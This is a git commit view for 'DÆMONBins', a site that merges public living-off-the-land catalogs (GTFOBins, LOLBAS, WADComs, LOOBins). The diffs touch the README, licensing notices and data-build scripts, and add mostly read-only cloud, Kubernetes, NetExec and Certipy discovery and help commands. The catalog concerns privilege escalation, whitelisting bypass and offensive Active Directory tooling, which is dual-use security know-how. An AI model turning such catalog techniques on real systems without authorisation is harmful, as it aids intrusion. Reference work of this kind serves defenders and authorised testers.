daemon-sec-lotl

DÆMONBins: GTFOBins × LOLBAS × WADComs × LOOBins in one filterable catalog
git clone https://git.daemon-sec.xyz/daemon-sec-lotl.git
Log | Files | Refs | Submodules | README | LICENSE

commit 2c11184249cba0cdfb4159d51a0755a269019f35
parent 07d4acf8a403301809cf699f800f37fd4ce3beb5
Author: $: DAΞMON <zer0sec.xp@icloud.com>
Date:   Sun,  4 Oct 2026 18:41:38 +0100

Expand catalog with sourced command workspace

Diffstat:
MREADME.md | 48++++++++++++++++++++++++++++--------------------
MTHIRD_PARTY_NOTICES.md | 20+++++++++++++++++---
Mdocs/IMPROVEMENT-PLAN.md | 16++++++++++++++++
Mpackage.json | 3++-
Mpublic/og.png | 0
Mpublic/og.svg | 33++++++++++++++++++---------------
Mscripts/build-dataset.mjs | 30+++++++++++++++++++-----------
Mscripts/build-index.mjs | 2++
Ascripts/curated-additions.mjs | 37+++++++++++++++++++++++++++++++++++++
Ascripts/enrich-data.mjs | 62++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Ascripts/import-loobins.mjs | 33+++++++++++++++++++++++++++++++++
Mscripts/og.mjs | 21+++++++++++----------
Ascripts/prepare-catalog-sources.mjs | 10++++++++++
Mscripts/technique-schema.mjs | 16+++++++++++++++-
Msrc/components/Footer.astro | 7++++---
Msrc/components/Header.astro | 3++-
Msrc/components/HeroDeck.astro | 8++++----
Asrc/data/catalog-additions.json | 720+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Msrc/data/facets.json | 42+++++++++++++++++++++++-------------------
Msrc/data/index-hash.json | 8++++----
Asrc/data/sources/loobins.json | 7873+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Asrc/data/sources/wadcoms-additions.json | 4802+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Msrc/data/techniques.json | 3+--
Msrc/data/tools.json | 3+--
Msrc/layouts/Base.astro | 6++++--
Asrc/lib/catalog-workspace.ts | 35+++++++++++++++++++++++++++++++++++
Msrc/lib/jsonld.ts | 2+-
Msrc/lib/render-row.ts | 42++++++++++++++++++++++++------------------
Msrc/lib/taxonomy.ts | 16+++++++++++-----
Msrc/lib/techniques.ts | 45+++++++++++++++++++++++++++++++++++++--------
Msrc/pages/[source]/[tool].astro | 12++++++++++--
Msrc/pages/catalog.astro | 103+++++++++++++++++++++++++++++++++++--------------------------------------------
Msrc/pages/credits.astro | 12+++++++++---
Msrc/pages/index.astro | 11++++++-----
Msrc/scripts/catalog.ts | 327+++++++++++++++++++++++++++++++++++++++----------------------------------------
Msrc/scripts/fuzz.ts | 4++--
Msrc/scripts/hero.ts | 4++--
Asrc/styles/workspace.css | 41+++++++++++++++++++++++++++++++++++++++++
Atest/catalog-workspace.test.mjs | 56++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Mwrangler.jsonc | 1+
40 files changed, 14149 insertions(+), 368 deletions(-)

diff --git a/README.md b/README.md @@ -8,7 +8,7 @@ https://daemon-sec-lotl.vercel.app/ https://daemon-404.github.io/daemon-sec-lotl/ -*GTFOBins × LOLBAS × WADComs — merged, resynced, and extended into one filterable catalog.* +*GTFOBins × LOLBAS × WADComs × LOOBins — merged, resynced, and extended into one filterable catalog.* <br> @@ -18,10 +18,10 @@ https://daemon-404.github.io/daemon-sec-lotl/ [![Deploy: Vercel](https://img.shields.io/badge/deploy-Vercel-e0def4?style=flat-square&labelColor=191724&logo=vercel&logoColor=e0def4)](https://lotl.daemon-sec.xyz/) [![Theme: Rosé Pine](https://img.shields.io/badge/theme-Ros%C3%A9_Pine-ebbcba?style=flat-square&labelColor=191724)](https://rosepinetheme.com) -[![Techniques](https://img.shields.io/badge/techniques-2885-eb6f92?style=flat-square&labelColor=191724)](https://lotl.daemon-sec.xyz/catalog) -[![Tools](https://img.shields.io/badge/tools-842-9ccfd8?style=flat-square&labelColor=191724)](https://lotl.daemon-sec.xyz/catalog) -[![DÆMON additions](https://img.shields.io/badge/D%C3%86MON_NEW-179-f6c177?style=flat-square&labelColor=191724)](https://lotl.daemon-sec.xyz/daemon) -[![Sources](https://img.shields.io/badge/decks-4-c4a7e7?style=flat-square&labelColor=191724)](#the-four-decks) +[![Techniques](https://img.shields.io/badge/techniques-3085-eb6f92?style=flat-square&labelColor=191724)](https://lotl.daemon-sec.xyz/catalog) +[![Tools](https://img.shields.io/badge/tools-907-9ccfd8?style=flat-square&labelColor=191724)](https://lotl.daemon-sec.xyz/catalog) +[![DÆMON additions](https://img.shields.io/badge/D%C3%86MON-196-f6c177?style=flat-square&labelColor=191724)](https://lotl.daemon-sec.xyz/daemon) +[![Sources](https://img.shields.io/badge/collections-5-c4a7e7?style=flat-square&labelColor=191724)](#the-five-collections) **[ Open the catalog → ](https://lotl.daemon-sec.xyz/catalog)** @@ -31,40 +31,44 @@ https://daemon-404.github.io/daemon-sec-lotl/ A static [Astro](https://astro.build) site with [Pagefind](https://pagefind.app) search, in the visual language of [daemon-sec.xyz](https://daemon-sec.xyz). Every living-off-the-land and -offensive technique from three public references is flattened to one filterable atom — a -**Technique** — and filterable by **platform**, **capability**, and **source**, with a NEW-only -toggle and shareable URL-state filters. Rows expand to the command, MITRE ATT&CK mapping, -detection, and references; per-tool pages group a binary's techniques. +offensive technique from four public references is flattened to one filterable atom — a +**Technique** — and filterable by **platform**, **capability**, **source**, **execution context**, +**required access**, **service**, **environment**, **availability**, and **evidence state**. The +catalog supports grouped variants, saved commands, configurable templates, shareable URL state, +and a compact details inspector. Per-tool pages group a binary's techniques. -All three upstreams are GPL-3.0, so this combined work is **GPL-3.0**. See +All four upstreams are GPL-3.0, so this combined work is **GPL-3.0**. See [`THIRD_PARTY_NOTICES.md`](./THIRD_PARTY_NOTICES.md) and [`LICENSE`](./LICENSE). -## ❀ The four decks +## ❀ The five collections | Deck | Source | Techniques | What it is | |---|---|--:|---| | 🩵 **GTFOBins** | `acd5246` | 2,125 | Unix binaries abused for shell, file r/w, and SUID / sudo / capabilities privesc | | 💜 **LOLBAS** | `7aca936` | 481 | Windows living-off-the-land binaries, scripts & libraries; execute, download, AWL bypass | | 💛 **WADComs** | `a864cd1` | 100 | Offensive Windows / Active Directory tooling, indexed by what access you hold | -| ❤️ **DÆMON** | *authored* | 179 | 134 fact-checked WADComs additions + a 45-entry modern 2024–2026 backlog, each badged **NEW** | -| | **Total** | **2,885** | **842 tools · all Zod-validated** | +| 🩷 **LOOBins** | `399e3c4` | 183 | macOS binaries and documented use cases | +| ❤️ **DÆMON** | *authored* | 196 | 134 fact-checked WADComs additions + 17 documented command references, badged **DÆMON** | +| | **Total** | **3,085** | **907 tools · all Zod-validated** | Everything is placeholder-only reference material (lab IPs, `test.local`, `john` / `password123`) -in the spirit of GTFOBins, LOLBAS, WADComs and MITRE ATT&CK. +in the spirit of GTFOBins, LOLBAS, WADComs, LOOBins and MITRE ATT&CK. ## ☧ Layout ``` vendor/{gtfobins,lolbas,wadcoms} the three upstreams (vendored; see setup-vendor.sh) +src/data/sources/loobins.json pinned LOOBins snapshot (183 use cases) +src/data/sources/wadcoms-additions.json committed authored WADComs snapshot scripts/build-dataset.mjs local ingestion → src/data/*.json + public/data scripts/wadcoms-normalize.mjs WADComs family fixes (Impacket split, case-fold) scripts/split-impacket.mjs one-shot, idempotent migration of the committed data src/data/techniques.json the canonical, committed dataset (a Technique[]) src/data/tools.json per-tool metadata (aliases, Full_Path, contributors) src/data/facets.json derived facet indexes + counts + upstream commits -src/data/daemon-backlog.json the DÆMON §7 modernization backlog (source for `npm run data`) +src/data/catalog-additions.json documented DÆMON command references src/pages/ home · /catalog · /<deck> · /<deck>/<tool> · credits · 404 -src/scripts/catalog.ts the vanilla-TS faceted-filter island +src/scripts/catalog.ts the vanilla-TS catalog workspace island src/lib/{taxonomy,techniques,highlight,url}.ts shared vocabulary + pure logic src/styles, src/components, src/fonts design system (cloned from the cheatsheet) ``` @@ -84,7 +88,7 @@ page so the static router never silently drops a tool. Both normalisations live ```bash npm install -npm run data # regenerate the dataset from vendor/ + the WADComs additions + the backlog +npm run data # regenerate the dataset from vendor/ + committed source snapshots npm run dev # local dev server npm run build # astro build + pagefind index → dist/ npm run preview # serve the production build @@ -95,12 +99,16 @@ re-runs ingestion, so there is no cross-repo dependency at deploy time. ## 💛 Regenerating the dataset -`npm run data` reads the vendored upstreams, the daemon-sec WADComs additions -(`../daemon-sec/client/src/data/tools/wadcoms.ts`, the `WADCOMS_ENTRIES` with `added: true`), and -`src/data/daemon-backlog.json`. It normalizes everything to the unified `Technique` model, +`npm run data` reads the vendored upstreams, the committed authored snapshots in +`src/data/sources/`, and `src/data/catalog-additions.json`. It normalizes everything to the unified `Technique` model, validates every record with Zod (failing on any bad or duplicate record), and writes `src/data/{techniques,tools,facets}.json` plus `public/data/techniques.json`. Commit the result. +`npm run data:enrich` reapplies the metadata pass without re-reading upstreams. It normalizes +access labels, execution contexts, environments, availability, evidence state, and compatibility +notes, then rebuilds the indexes. The catalog's bookmarks, saved views, density, font size, line +wrapping, and reduced-motion preference stay in the browser's local storage. + To refresh against the latest upstreams (submodule route): ```bash diff --git a/THIRD_PARTY_NOTICES.md b/THIRD_PARTY_NOTICES.md @@ -1,8 +1,8 @@ # Third-party notices -DÆMONBins — the *Off-the-Land Almanac* — is a merged catalog built from three +DÆMONBins — the *Off-the-Land Almanac* — is a merged catalog built from four public, GPL-3.0-licensed living-off-the-land reference projects. Because all -three upstreams are licensed under the **GNU General Public License v3.0**, the +four upstreams are licensed under the **GNU General Public License v3.0**, the combined dataset and this site are a single **GPL-3.0** work. The full license text ships in [`LICENSE`](./LICENSE). @@ -11,7 +11,9 @@ back to the upstream entry. The upstream repositories remain the canonical sources — please star them, contribute back, and report any inaccuracy upstream so the whole community benefits. -The three upstreams are vendored under [`vendor/`](./vendor) (see +The three repository snapshots are vendored under [`vendor/`](./vendor), while +the LOOBins snapshot is committed under [`src/data/sources/`](./src/data/sources) +(see [`scripts/setup-vendor.sh`](./scripts/setup-vendor.sh) to formalize them as submodules) and the normalized dataset is regenerated from them with `npm run data`. @@ -64,6 +66,18 @@ submodules) and the normalized dataset is regenerated from them with label is kept in `nativeCategory`, `items`/`services` are preserved, and Active Directory scope is derived from the services/items each entry declares. +## LOOBins + +- **Project:** LOOBins — macOS living-off-the-land binaries and documented use cases. +- **Homepage:** https://loobins.io/ +- **Source:** https://github.com/infosecB/LOOBins +- **Created by:** LOOBins contributors. +- **License:** GNU GPL-3.0 (`src/data/sources/loobins.json` records the upstream license). +- **Imported at commit:** `399e3c4bdddb55c7dc49beb20bfe43490eac1184`. +- **What was done here:** the pinned YAML snapshot is normalized into 183 technique rows; + upstream names, descriptions, paths, references, detections, and macOS context are retained. + These are labelled **Upstream reference**, not lab-tested results. + --- ## DÆMON additions diff --git a/docs/IMPROVEMENT-PLAN.md b/docs/IMPROVEMENT-PLAN.md @@ -12,6 +12,22 @@ into one filterable Technique index. The site has just been migrated from GitHub round of improvements** — not a single feature — so this document surveys the site as it stands, records concrete findings, and turns them into an ordered backlog with enough detail to execute. +## Second pass — 2026-10-04 + +The main catalog work from this plan is now landed. The committed dataset contains 3,085 +techniques across 907 tools: GTFOBins, LOLBAS, WADComs, the pinned LOOBins snapshot, and 196 +DÆMON-authored rows. The catalog is now server-rendered for the initial result set and has a +compact workbench with multi-word search, contextual facet counts, grouped variants, sorting, +shareable URL state, a details inspector, shell-aware template configuration, bookmarks, saved +views, density/font/wrapping controls, and reduced-motion persistence. The data pipeline no longer +depends on a sibling checkout for authored rows: `src/data/sources/` and +`src/data/catalog-additions.json` are the committed inputs, with `npm run data:enrich` available +for metadata-only refreshes. LOOBins provenance and GPL-3.0 attribution are documented in +`THIRD_PARTY_NOTICES.md` and `/credits`. + +The original survey below remains useful as historical context; its counts and “deferred” labels +describe the first-pass checkout, not the current catalog. + ## Survey log (what was inspected, in order) - [x] `package.json`, `astro.config.mjs`, `vercel.json`, `README.md` — read. diff --git a/package.json b/package.json @@ -10,7 +10,8 @@ }, "scripts": { "dev": "npm run build:index && npm run data:public && astro dev", - "data": "node scripts/build-dataset.mjs", + "data": "node scripts/build-dataset.mjs && npm run build:index && npm run data:public", + "data:enrich": "node scripts/enrich-data.mjs && npm run build:index && npm run data:public", "data:public": "node -e \"const fs=require('fs');fs.mkdirSync('public/data',{recursive:true});fs.copyFileSync('src/data/techniques.json','public/data/techniques.json')\"", "build:index": "node scripts/build-index.mjs", "og": "node scripts/og.mjs", diff --git a/public/og.png b/public/og.png Binary files differ. diff --git a/public/og.svg b/public/og.svg @@ -27,21 +27,24 @@ <text x="76" y="300" fill="#e0def4" font-weight="800" font-size="150" letter-spacing="-7">D<tspan fill="#eb6f92">Æ</tspan>MONBins</text> </g> <text x="80" y="368" fill="#908caa" font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="600" font-size="44" letter-spacing="-1">the Off-the-Land Almanac</text> - <text x="1120" y="366" text-anchor="end" fill="#e0def4" font-family="'DM Mono', 'JetBrains Mono', 'Liberation Mono', monospace" font-size="26" letter-spacing="1">2,885 techniques · 842 tools</text> - <text x="80" y="420" fill="#6e6a86" font-family="'DM Mono', 'JetBrains Mono', 'Liberation Mono', monospace" font-size="22" letter-spacing="0.5">GTFOBins × LOLBAS × WADComs — merged, resynced, extended · MITRE ATT&amp;CK mapped</text> - <!-- the four decks --> + <text x="1120" y="366" text-anchor="end" fill="#e0def4" font-family="'DM Mono', 'JetBrains Mono', 'Liberation Mono', monospace" font-size="26" letter-spacing="1">3,085 techniques · 907 tools</text> + <text x="80" y="420" fill="#6e6a86" font-family="'DM Mono', 'JetBrains Mono', 'Liberation Mono', monospace" font-size="22" letter-spacing="0.5">GTFOBins × LOLBAS × WADComs × LOOBins — merged, resynced, extended · MITRE ATT&amp;CK mapped</text> + <!-- the five collections --> <g font-family="'DM Mono', 'JetBrains Mono', 'Liberation Mono', monospace"> - <rect x="80" y="470" width="236" height="4" fill="#9ccfd8"/> - <text x="80" y="522" fill="#e0def4" font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="700" font-size="46" letter-spacing="-2">2,125</text> - <text x="80" y="556" fill="#9ccfd8" font-size="20" letter-spacing="3">GTFOBINS</text> - <rect x="342" y="470" width="236" height="4" fill="#c4a7e7"/> - <text x="342" y="522" fill="#e0def4" font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="700" font-size="46" letter-spacing="-2">481</text> - <text x="342" y="556" fill="#c4a7e7" font-size="20" letter-spacing="3">LOLBAS</text> - <rect x="604" y="470" width="236" height="4" fill="#f6c177"/> - <text x="604" y="522" fill="#e0def4" font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="700" font-size="46" letter-spacing="-2">100</text> - <text x="604" y="556" fill="#f6c177" font-size="20" letter-spacing="3">WADCOMS</text> - <rect x="866" y="470" width="236" height="4" fill="#eb6f92"/> - <text x="866" y="522" fill="#e0def4" font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="700" font-size="46" letter-spacing="-2">179</text> - <text x="866" y="556" fill="#eb6f92" font-size="20" letter-spacing="3">DÆMON</text> + <rect x="55" y="470" width="194" height="4" fill="#9ccfd8"/> + <text x="55" y="522" fill="#e0def4" font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="700" font-size="46" letter-spacing="-2">2,125</text> + <text x="55" y="556" fill="#9ccfd8" font-size="20" letter-spacing="3">GTFOBINS</text> + <rect x="275" y="470" width="194" height="4" fill="#c4a7e7"/> + <text x="275" y="522" fill="#e0def4" font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="700" font-size="46" letter-spacing="-2">481</text> + <text x="275" y="556" fill="#c4a7e7" font-size="20" letter-spacing="3">LOLBAS</text> + <rect x="495" y="470" width="194" height="4" fill="#f6c177"/> + <text x="495" y="522" fill="#e0def4" font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="700" font-size="46" letter-spacing="-2">100</text> + <text x="495" y="556" fill="#f6c177" font-size="20" letter-spacing="3">WADCOMS</text> + <rect x="715" y="470" width="194" height="4" fill="#ebbcba"/> + <text x="715" y="522" fill="#e0def4" font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="700" font-size="46" letter-spacing="-2">183</text> + <text x="715" y="556" fill="#ebbcba" font-size="20" letter-spacing="3">LOOBINS</text> + <rect x="935" y="470" width="194" height="4" fill="#eb6f92"/> + <text x="935" y="522" fill="#e0def4" font-family="'Noto Sans Display', 'Archivo', 'Liberation Sans', sans-serif" font-weight="700" font-size="46" letter-spacing="-2">196</text> + <text x="935" y="556" fill="#eb6f92" font-size="20" letter-spacing="3">DÆMON</text> </g> </svg> diff --git a/scripts/build-dataset.mjs b/scripts/build-dataset.mjs @@ -20,7 +20,7 @@ import { readFileSync, writeFileSync, readdirSync, existsSync, mkdirSync, statSy import { fileURLToPath } from 'node:url'; import { dirname, join, resolve } from 'node:path'; import yaml from 'js-yaml'; -import esbuild from 'esbuild'; +import { enrich, stableId } from './enrich-data.mjs'; import { impacketScript, canonicalizeFamilyCase } from './wadcoms-normalize.mjs'; import { PLATFORMS, SOURCES, CAPABILITIES, validateTechniques } from './technique-schema.mjs'; @@ -30,7 +30,7 @@ const VENDOR = join(ROOT, 'vendor'); const OUT_SRC = join(ROOT, 'src', 'data'); const OUT_PUB = join(ROOT, 'public', 'data'); // Source of truth for the 134 daemon-authored WADComs additions. -const WADCOMS_TS = resolve(ROOT, '..', 'daemon-sec', 'client', 'src', 'data', 'tools', 'wadcoms.ts'); +const WADCOMS_JSON = join(OUT_SRC, 'sources', 'wadcoms-additions.json'); // Optional: the §7 modernization backlog, emitted by the daemonbins-backlog workflow. const BACKLOG_JSON = join(OUT_SRC, 'daemon-backlog.json'); @@ -391,15 +391,9 @@ function ingestWadcomsUpstream() { } async function ingestWadcomsAdditions() { - if (!existsSync(WADCOMS_TS)) { - console.warn(` ! WADComs additions TS not found at ${WADCOMS_TS} — skipping 134 additions`); - return []; - } - const src = readFileSync(WADCOMS_TS, 'utf8'); - const { code } = await esbuild.transform(src, { loader: 'ts', format: 'esm' }); - const mod = await import('data:text/javascript;base64,' + Buffer.from(code).toString('base64')); - const entries = (mod.WADCOMS_ENTRIES || []).filter((e) => e.added === true); - return entries.map((e) => wadTechnique(e, 'DAEMON')).filter((t) => t.command); + const entries = JSON.parse(readFileSync(WADCOMS_JSON, 'utf8')); + if (!entries.length) throw new Error('Authored WADComs source is empty'); + return entries; } // --------------------------------------------------------------------------- @@ -470,6 +464,10 @@ function toolsFromWad(techniques) { // --------------------------------------------------------------------------- async function main() { console.log('DÆMONBins dataset build\n'); + for (const dir of ['gtfobins/_gtfobins', 'lolbas/yml', 'wadcoms/_wadcoms']) { + if (!existsSync(join(VENDOR, dir))) throw new Error(`Missing upstream source: vendor/${dir}`); + } + const oldRows = JSON.parse(readFileSync(join(OUT_SRC, 'techniques.json'), 'utf8')); const gtfo = ingestGtfobins(); console.log(` GTFOBins : ${gtfo.techniques.length} techniques, ${gtfo.tools.length} tools (${gtfo.aliasCount} aliases)`); @@ -492,6 +490,15 @@ async function main() { const techniques = [ ...gtfo.techniques, ...lolbas.techniques, ...wadTechs, ...backlog.techniques, ]; + // Retain all established anchors. New records use content-derived IDs rather + // than upstream positions, so reordering cannot reassign a bookmarked ID. + const identity = t => JSON.stringify([t.toolId, t.command, t.context || t.privilege || '', t.nativeCategory]); + const oldIds = new Map(); + for (const t of oldRows) { + const key = identity(t), ids = oldIds.get(key) || []; + ids.push(t.id); oldIds.set(key, ids); + } + for (const t of techniques) t.id = oldIds.get(identity(t))?.shift() || stableId(t.toolId, identity(t)); const wadTools = toolsFromWad(wadTechs); const tools = [...gtfo.tools, ...lolbas.tools, ...wadTools, ...backlog.tools]; @@ -542,6 +549,7 @@ async function main() { console.log(` by platform: ${JSON.stringify(byPlatform)}`); console.log(` added(NEW): ${facets.counts.added}`); console.log('\n wrote src/data/{techniques,tools,facets}.json + public/data/techniques.json'); + enrich(); } function readCommit(name) { diff --git a/scripts/build-index.mjs b/scripts/build-index.mjs @@ -21,6 +21,8 @@ const ROOT = resolve(dirname(fileURLToPath(import.meta.url)), '..'); export const LIST_FIELDS = [ 'id', 'toolId', 'toolName', 'name', 'source', 'platform', 'capability', 'nativeCategory', 'command', 'description', 'usecase', 'mitre', 'privilege', 'added', + 'context', 'requires', 'services', 'environment', 'aliases', 'availability', 'verification', + 'reviewedAt', 'compatibility', 'expected', 'troubleshooting', 'sideEffects', 'restore', 'template', 'references', 'detection', ]; export function project(t) { diff --git a/scripts/curated-additions.mjs b/scripts/curated-additions.mjs @@ -0,0 +1,37 @@ +// Maintained command references. These commands are displayed, never executed. +const v = (key, label, value) => ({ key, label, default: value }); +const profile = v('profile', 'AWS profile', 'lab'); +const ns = v('namespace', 'Namespace', 'default'); +const project = v('project', 'GCP project', 'lab-project'); +const definitions = [ + ['aws-identity', 'aws', 'Identify the active AWS principal', 'AWS', 'aws sts get-caller-identity --profile {{profile}}', [profile], 'https://docs.aws.amazon.com/cli/latest/reference/sts/get-caller-identity.html', 'Returns the account ID, ARN and user ID for the credentials selected by this profile.', 'ExpiredToken or InvalidClientTokenId means the selected credentials need refreshing. Check the profile before interpreting identity results.'], + ['aws-config', 'aws', 'Inspect AWS configuration sources', 'AWS', 'aws configure list --profile {{profile}}', [profile], 'https://docs.aws.amazon.com/cli/latest/reference/configure/list.html', 'Shows resolved configuration and where each value comes from; credentials are masked.', 'Environment variables can override profile configuration. Check the source column.'], + ['aws-regions', 'aws', 'List enabled AWS regions', 'AWS', 'aws ec2 describe-regions --profile {{profile}} --region {{region}}', [profile, v('region', 'Region', 'eu-west-2')], 'https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-regions.html', 'Returns enabled region names and endpoints.', 'Requires ec2:DescribeRegions. A denied request is not evidence that no regions exist.'], + ['azure-account', 'az', 'Inspect the active Azure subscription', 'Azure', 'az account show --output json', [], 'https://learn.microsoft.com/en-us/cli/azure/account?view=azure-cli-latest#az-account-show', 'Shows the active subscription, tenant and account.', 'Run the authorised sign-in workflow if the CLI has no current account.'], + ['azure-subscriptions', 'az', 'List accessible Azure subscriptions', 'Azure', 'az account list --output table', [], 'https://learn.microsoft.com/en-us/cli/azure/account?view=azure-cli-latest#az-account-list', 'Shows subscriptions available to the current account.', 'A subscription list does not establish permissions on its resources.'], + ['gcp-projects', 'gcloud', 'List accessible GCP projects', 'GCP', 'gcloud projects list --format=json', [], 'https://cloud.google.com/sdk/gcloud/reference/projects/list', 'Lists visible projects for the active account.', 'Service-account principal-set grants may not appear in this listing.'], + ['gcp-config', 'gcloud', 'Inspect the active gcloud configuration', 'GCP', 'gcloud config list', [], 'https://cloud.google.com/sdk/gcloud/reference/config/list', 'Shows configured account, project and other properties.', 'Configured properties do not prove that the account has access to the selected project.'], + ['gcp-policy', 'gcloud', 'Read a project IAM policy', 'GCP', 'gcloud projects get-iam-policy {{project}} --format=json', [project], 'https://cloud.google.com/sdk/gcloud/reference/projects/get-iam-policy', 'Shows policy bindings visible to the current account.', 'Requires resourcemanager.projects.getIamPolicy; inherited grants need separate review.'], + ['kube-context', 'kubectl', 'Check the current Kubernetes context', 'Containers', 'kubectl config current-context', [], 'https://kubernetes.io/docs/reference/kubectl/generated/kubectl_config/kubectl_config_current-context/', 'Prints the selected kubeconfig context without contacting the cluster.', 'An unset current context must be selected before cluster queries.'], + ['kube-contexts', 'kubectl', 'List kubeconfig contexts', 'Containers', 'kubectl config get-contexts', [], 'https://kubernetes.io/docs/reference/kubectl/generated/kubectl_config/kubectl_config_get-contexts/', 'Shows configured clusters, identities and namespaces.', 'This lists local configuration, not proof of cluster connectivity or permission.'], + ['kube-permissions', 'kubectl', 'Review permissions in a namespace', 'Containers', 'kubectl auth can-i --list --namespace {{namespace}}', [ns], 'https://kubernetes.io/docs/reference/kubectl/generated/kubectl_auth/kubectl_auth_can-i/', 'Returns the server-reported rules for the active identity in this namespace.', 'Some authorizers cannot enumerate every rule. Check a specific verb/resource when the list is incomplete.'], + ['kube-pod-permission', 'kubectl', 'Check permission to list pods', 'Containers', 'kubectl auth can-i list pods --namespace {{namespace}}', [ns], 'https://kubernetes.io/docs/reference/kubectl/generated/kubectl_auth/kubectl_auth_can-i/', 'Returns yes or no for this particular action.', 'The selected context and namespace determine which identity and resources are checked.'], + ['nxc-modules', 'NetExec', 'List available SMB modules', 'Active Directory', 'nxc smb -L', [], 'https://www.netexec.wiki/getting-started/using-modules', 'Lists modules supported by the installed NetExec version.', 'Module names and options vary by release. Inspect module help before using a module.'], + ['nxc-module-options', 'NetExec', 'Inspect options for an SMB module', 'Active Directory', 'nxc smb -M {{module}} --options', [v('module', 'Module', 'spider_plus')], 'https://www.netexec.wiki/getting-started/using-modules', 'Shows the selected module options.', 'This is module help, not a module run. Use the spelling reported by nxc smb -L.'], + ['nxc-help', 'NetExec', 'Inspect SMB authentication and connection options', 'Active Directory', 'nxc smb --help', [], 'https://www.netexec.wiki/getting-started/selecting-and-using-a-protocol', 'Shows flags supported by the installed SMB protocol implementation.', 'Use protocol-specific help because supported flags differ by protocol and version.'], + ['certipy-find-help', 'Certipy', 'Inspect certificate discovery options', 'Active Directory', 'certipy find -h', [], 'https://github.com/ly4k/Certipy/wiki/08-%E2%80%90-Command-Reference', 'Shows discovery, output and authentication options for the installed Certipy release.', 'Compare your installed release with the wiki before adapting an older example.'], + ['certipy-version-help', 'Certipy', 'Inspect Certipy commands and version banner', 'Active Directory', 'certipy -h', [], 'https://github.com/ly4k/Certipy/wiki', 'Shows the installed command set and version banner.', 'The AD CS conditions behind an ESC label matter as much as CLI syntax; consult the linked official guide.'], +]; + +export const curatedAdditions = definitions.map(([id, tool, name, env, command, variables, ref, expected, troubleshooting]) => ({ + id: `daemon:reference:${id}`, toolId: tool === 'NetExec' || tool === 'Certipy' ? `wadcoms:${tool}` : `daemon:${tool}`, + toolName: tool, name, source: 'DAEMON', platform: ['Linux', 'Windows', 'macOS'], + environment: [env], capability: ['Discovery'], nativeCategory: ['Configuration and verification'], + command: command.replace(/\{\{(\w+)\}\}/g, (_, k) => `'${variables.find(v => v.key === k).default}'`), + template: variables.length ? { command, shell: 'posix', variables } : undefined, + description: expected, expected, troubleshooting, sideEffects: 'No intentional configuration changes. Remote reads may generate audit events.', + compatibility: 'Examples use POSIX shell quoting. Consult installed tool help for version-specific options.', + requires: /^(aws|az|gcloud)/.test(tool) ? ['Authenticated CLI session'] : tool === 'kubectl' ? ['Kubeconfig'] : [], + mitre: [], references: [ref], availability: 'Installed tool', verification: 'Documentation checked', + reviewedAt: '2026-10-04', added: true, +})); diff --git a/scripts/enrich-data.mjs b/scripts/enrich-data.mjs @@ -0,0 +1,62 @@ +import { readFileSync, writeFileSync } from 'node:fs'; +import { createHash } from 'node:crypto'; +import { fileURLToPath } from 'node:url'; +import { resolve, dirname } from 'node:path'; +import { validateTechniques, SOURCES, PLATFORMS, CAPABILITIES } from './technique-schema.mjs'; + +const root = resolve(dirname(fileURLToPath(import.meta.url)), '..'); +const read = p => JSON.parse(readFileSync(resolve(root, p), 'utf8')); +const uniq = a => [...new Set(a)]; +export const stableId = (prefix, value) => `${prefix}:${createHash('sha256').update(value).digest('hex').slice(0, 16)}`; + +export function normalizeTechnique(t) { + const row = { ...t }; + // A Unix command is not evidence of macOS compatibility. Dedicated LOOBins + // entries retain macOS; GTFOBins entries remain Linux pending per-command review. + if (row.source === 'GTFOBins') { + row.platform = row.platform.filter(p => p !== 'macOS'); + row.compatibility = 'Linux reference. macOS compatibility has not been checked for this command and execution context.'; + } + const itemMap = { No_Creds: 'No credentials', AES_Key: 'AES key', Hash: 'NTLM hash', PFX: 'Certificate', TGT: 'Kerberos ticket', TGS: 'Kerberos ticket', powershell: 'PowerShell', PowerShell: 'PowerShell' }; + row.requires = uniq((row.requires || []).filter(x => !['PrivEsc', 'Exploitation', 'target', 'service'].includes(x)).map(x => itemMap[x] || x)); + row.services = uniq((row.services || []).filter(x => x !== 'Enumeration')); + row.environment ||= /kubectl|crictl|^ctr$|runc|nerdctl|docker/i.test(row.toolName) ? ['Containers'] : row.platform.includes('ActiveDirectory') ? ['Active Directory'] : ['Local host']; + row.verification ||= 'Upstream reference'; + row.availability ||= row.source === 'LOOBins' ? 'Built in' : row.source === 'WADComs' || row.toolId.startsWith('wadcoms:') ? 'Installed tool' : 'Check installation'; + return row; +} + +export function enrich() { + const previous = read('src/data/techniques.json'); + const existingTools = new Map(read('src/data/tools.json').map(t => [t.id, t])); + const snapshot = read('src/data/sources/loobins.json'); + const additions = read('src/data/catalog-additions.json'); + const replaceIds = new Set([...snapshot.techniques, ...additions].map(t => t.id)); + const techniques = [...previous.filter(t => t.source !== 'LOOBins' && !replaceIds.has(t.id)), ...snapshot.techniques, ...additions].map(normalizeTechnique); + const tools = new Map(); + for (const t of techniques) { + const old = existingTools.get(t.toolId); + t.aliases = uniq([...(t.aliases || []), ...(old?.aliases || [])]); + if (!tools.has(t.toolId)) tools.set(t.toolId, { ...old, id: t.toolId, name: t.toolName, source: t.source, platform: [], references: [], count: 0 }); + const tool = tools.get(t.toolId); + tool.platform = uniq([...tool.platform, ...t.platform]); + tool.references = uniq([...tool.references, ...t.references]); + tool.count++; + } + const problems = validateTechniques(techniques); + if (problems.length) throw new Error(problems.join('\n')); + const count = values => values.reduce((a, v) => ({ ...a, [v]: (a[v] || 0) + 1 }), {}); + const facets = read('src/data/facets.json'); + facets.platforms = PLATFORMS.filter(p => techniques.some(t => t.platform.includes(p))); 